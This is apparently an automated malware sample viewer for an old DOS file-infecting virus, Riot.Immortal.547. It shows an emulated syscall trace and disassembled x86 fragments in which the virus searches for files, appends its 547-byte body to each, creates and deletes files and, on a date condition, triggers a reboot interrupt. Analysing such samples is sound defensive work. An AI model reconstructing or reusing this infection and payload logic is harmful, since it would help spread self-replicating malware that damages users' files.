Sample viewer

vx.netlux.org/Virus.DOS.Riot.Immortal.547

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:07:45.302673167Z 26 PC: 12a6c | Set disk transfer address
2018-12-17T23:07:45.304516512Z 53 PC: 12a72 | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T23:07:45.313794022Z 53 PC: 12a7f | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T23:07:45.316879Z 44 PC: 12a8a | Get time 0x12a8a: cmp dl, 0xd
0x12a8d: jg 0x12a93
0x12a8f: mov al, 0x82
0x12a91: out 0x21, al
0x12a93: lea dx, word ptr [bp + 0x2cd]
0x12a97: call 0x12b88
0x12a9a: lea dx, word ptr [bp + 0x2dd]
0x12a9e: call 0x12b88
0x12aa1: mov ah, 0x3c
0x12aa3: mov cx, 0
0x12aa6: lea dx, word ptr [bp + 0x2ef]
0x12aaa: int 0x21
0x12aac: lea dx, word ptr [bp + 0x2fd]
0x12ab0: mov si, 0x1f
0x12ab3: call 0x12bd9
0x12ab6: mov bx, ax
0x12ab8: mov ax, 0x4000
0x12abb: mov cx, 0x1f
0x12abe: lea si, word ptr [bp + 0x2fd]
0x12ac2: int 0x21
2018-12-17T23:07:45.319603702Z 61 PC: 12b8d | Open file (Filename = '')
2018-12-17T23:07:45.339011524Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:07:45.345517383Z 66 PC: 12baa | Move file pointer
2018-12-17T23:07:45.347347483Z 64 PC: 12bbc | Write file or device (Write 547 bytes on handle 5)
2018-12-17T23:07:45.689585869Z 66 PC: 12bc4 | Move file pointer
2018-12-17T23:07:45.691789441Z 64 PC: 12bcf | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:07:45.695449261Z 62 PC: 12bd8 | Close file
2018-12-17T23:07:45.708745023Z 61 PC: 12b8d | Open file (Filename = '')
2018-12-17T23:07:45.72054282Z 60 PC: 12aac | Create or truncate file
2018-12-17T23:07:45.732567343Z 64 PC: 12ac4 | Write file or device (Write 31 bytes on handle 5)
2018-12-17T23:07:45.742293034Z 62 PC: 12ad3 | Close file
2018-12-17T23:07:45.75128677Z 44 PC: 12ad7 | Get time 0x12ad7: cmp dl, 0x32
0x12ada: jg 0x12b09
0x12adc: mov si, 0x12
0x12adf: lea dx, word ptr [bp + 0x1b7]
0x12ae3: call 0x12bd9
0x12ae6: mov ah, 9
0x12ae8: int 0x21
0x12aea: mov si, 0x12
0x12aed: call 0x12bd9
0x12af0: mov ah, 0
0x12af2: int 0x16
0x12af4: jmp 0x12b09
0x12af7: sub byte ptr [si], cl
0x12af9: or al, 0x2e
0x12afb: adc dx, word ptr [di]
0x12afd: and byte ptr [di], cl
0x12aff: outsw dx, word ptr [si]
0x12b00: je 0x12b76
0x12b02: jno 0x12b64
0x12b04: pushaw
2018-12-17T23:07:45.754951919Z 67 PC: 12bf1 | Get or set file attributes
2018-12-17T23:07:45.76191084Z 65 PC: 12bf5 | Delete file (Filename = '')
2018-12-17T23:07:45.76955532Z 78 PC: 12b25 | Find first file
2018-12-17T23:07:45.776922388Z 61 PC: 12b8d | Open file (Filename = '')
2018-12-17T23:07:45.78455198Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:07:45.792938634Z 66 PC: 12baa | Move file pointer
2018-12-17T23:07:45.795189155Z 64 PC: 12bbc | Write file or device (Write 547 bytes on handle 5)
2018-12-17T23:07:45.811216752Z 66 PC: 12bc4 | Move file pointer
2018-12-17T23:07:45.814280802Z 64 PC: 12bcf | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:07:45.82203102Z 62 PC: 12bd8 | Close file
2018-12-17T23:07:45.832331572Z 79 PC: 12b25 | Find next file
2018-12-17T23:07:45.837262822Z 61 PC: 12b8d | Open file (Filename = '')
2018-12-17T23:07:45.845332641Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:07:45.852657429Z 66 PC: 12baa | Move file pointer
2018-12-17T23:07:45.855951992Z 64 PC: 12bbc | Write file or device (Write 547 bytes on handle 5)
2018-12-17T23:07:45.864949204Z 66 PC: 12bc4 | Move file pointer
2018-12-17T23:07:45.866966516Z 64 PC: 12bcf | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:07:45.875194483Z 62 PC: 12bd8 | Close file
2018-12-17T23:07:45.885111554Z 79 PC: 12b25 | Find next file
2018-12-17T23:07:45.888096205Z 61 PC: 12b8d | Open file (Filename = '')
2018-12-17T23:07:45.899347614Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:07:45.906719311Z 66 PC: 12baa | Move file pointer
2018-12-17T23:07:45.908609955Z 64 PC: 12bbc | Write file or device (Write 547 bytes on handle 5)
2018-12-17T23:07:45.917457376Z 66 PC: 12bc4 | Move file pointer
2018-12-17T23:07:45.920129889Z 64 PC: 12bcf | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:07:45.927408091Z 62 PC: 12bd8 | Close file
2018-12-17T23:07:45.936635797Z 79 PC: 12b25 | Find next file
2018-12-17T23:07:45.940750381Z 61 PC: 12b8d | Open file (Filename = '')
2018-12-17T23:07:45.948119182Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:07:45.955769663Z 66 PC: 12baa | Move file pointer
2018-12-17T23:07:45.958666038Z 64 PC: 12bbc | Write file or device (Write 547 bytes on handle 5)
2018-12-17T23:07:45.968761514Z 66 PC: 12bc4 | Move file pointer
2018-12-17T23:07:45.970378534Z 64 PC: 12bcf | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:07:45.978560223Z 62 PC: 12bd8 | Close file
2018-12-17T23:07:45.988103001Z 79 PC: 12b25 | Find next file
2018-12-17T23:07:45.991007441Z 61 PC: 12b8d | Open file (Filename = 'yb.com')
2018-12-17T23:07:45.999511316Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:07:46.006922416Z 66 PC: 12baa | Move file pointer
2018-12-17T23:07:46.008834941Z 64 PC: 12bbc | Write file or device (Write 547 bytes on handle 5)
2018-12-17T23:07:46.018157474Z 66 PC: 12bc4 | Move file pointer
2018-12-17T23:07:46.021184785Z 64 PC: 12bcf | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:07:46.028336919Z 62 PC: 12bd8 | Close file
2018-12-17T23:07:46.037478433Z 42 PC: 12b50 | Get date 0x12b50: cmp dh, 0x11
0x12b53: jl 0x12b7c
0x12b55: cmp dl, 8
0x12b58: jl 0x12b7c
0x12b5a: lea dx, word ptr [bp + 0x1b7]
0x12b5e: mov si, 0x12
0x12b61: call 0x12bd9
0x12b64: mov bx, dx
0x12b66: mov ah, 0x19
0x12b68: int 0x21
0x12b6a: mov cx, 0x25
0x12b6d: mov dx, 0
0x12b70: push ds
0x12b71: pop es
0x12b72: mov byte ptr [bp + 0x238], 0x26
0x12b77: int 0x19
0x12b79: add sp, 2
0x12b7c: mov ah, 0x1a
0x12b7e: mov dx, 0x80
0x12b81: int 0x21
2018-12-17T23:07:46.041039667Z 26 PC: 12b83 | Set disk transfer address
2018-12-17T23:07:46.043571125Z 26 PC: 12a6c | Set disk transfer address
2018-12-17T23:07:46.045088217Z 53 PC: 12a72 | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T23:07:46.047339318Z 53 PC: 12a7f | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T23:07:46.048982607Z 44 PC: 12a8a | Get time 0x12a8a: cmp dl, 0xd
0x12a8d: jg 0x12a93
0x12a8f: mov al, 0x82
0x12a91: out 0x21, al
0x12a93: lea dx, word ptr [bp + 0x2cd]
0x12a97: call 0x12b88
0x12a9a: lea dx, word ptr [bp + 0x2dd]
0x12a9e: call 0x12b88
0x12aa1: mov ah, 0x3c
0x12aa3: mov cx, 0
0x12aa6: lea dx, word ptr [bp + 0x2ef]
0x12aaa: int 0x21
0x12aac: lea dx, word ptr [bp + 0x2fd]
0x12ab0: mov si, 0x1f
0x12ab3: call 0x12bd9
0x12ab6: mov bx, ax
0x12ab8: mov ax, 0x4000
0x12abb: mov cx, 0x1f
0x12abe: lea si, word ptr [bp + 0x2fd]
0x12ac2: int 0x21
2018-12-17T23:07:46.052852301Z 61 PC: 12b8d | Open file (Filename = '�B+ə�!-')
2018-12-17T23:07:46.061001229Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:07:46.067269211Z 62 PC: 12bd8 | Close file
2018-12-17T23:07:46.070004653Z 61 PC: 12b8d | Open file (Filename = '@�#��')
2018-12-17T23:07:46.078496796Z 60 PC: 12aac | Create or truncate file
2018-12-17T23:07:46.092229659Z 64 PC: 12ac4 | Write file or device (Write 31 bytes on handle 5)
2018-12-17T23:07:46.096642284Z 62 PC: 12ad3 | Close file
2018-12-17T23:07:46.1062963Z 44 PC: 12ad7 | Get time 0x12ad7: cmp dl, 0x32
0x12ada: jg 0x12b09
0x12adc: mov si, 0x12
0x12adf: lea dx, word ptr [bp + 0x1b7]
0x12ae3: call 0x12bd9
0x12ae6: mov ah, 9
0x12ae8: int 0x21
0x12aea: mov si, 0x12
0x12aed: call 0x12bd9
0x12af0: mov ah, 0
0x12af2: int 0x16
0x12af4: jmp 0x12b09
0x12af7: sub byte ptr [si], cl
0x12af9: or al, 0x2e
0x12afb: adc dx, word ptr [di]
0x12afd: and byte ptr [di], cl
0x12aff: outsw dx, word ptr [si]
0x12b00: je 0x12b76
0x12b02: jno 0x12b64
0x12b04: pushaw
2018-12-17T23:07:46.109863606Z 9 PC: 12aea | Display string (Could not find end pointer)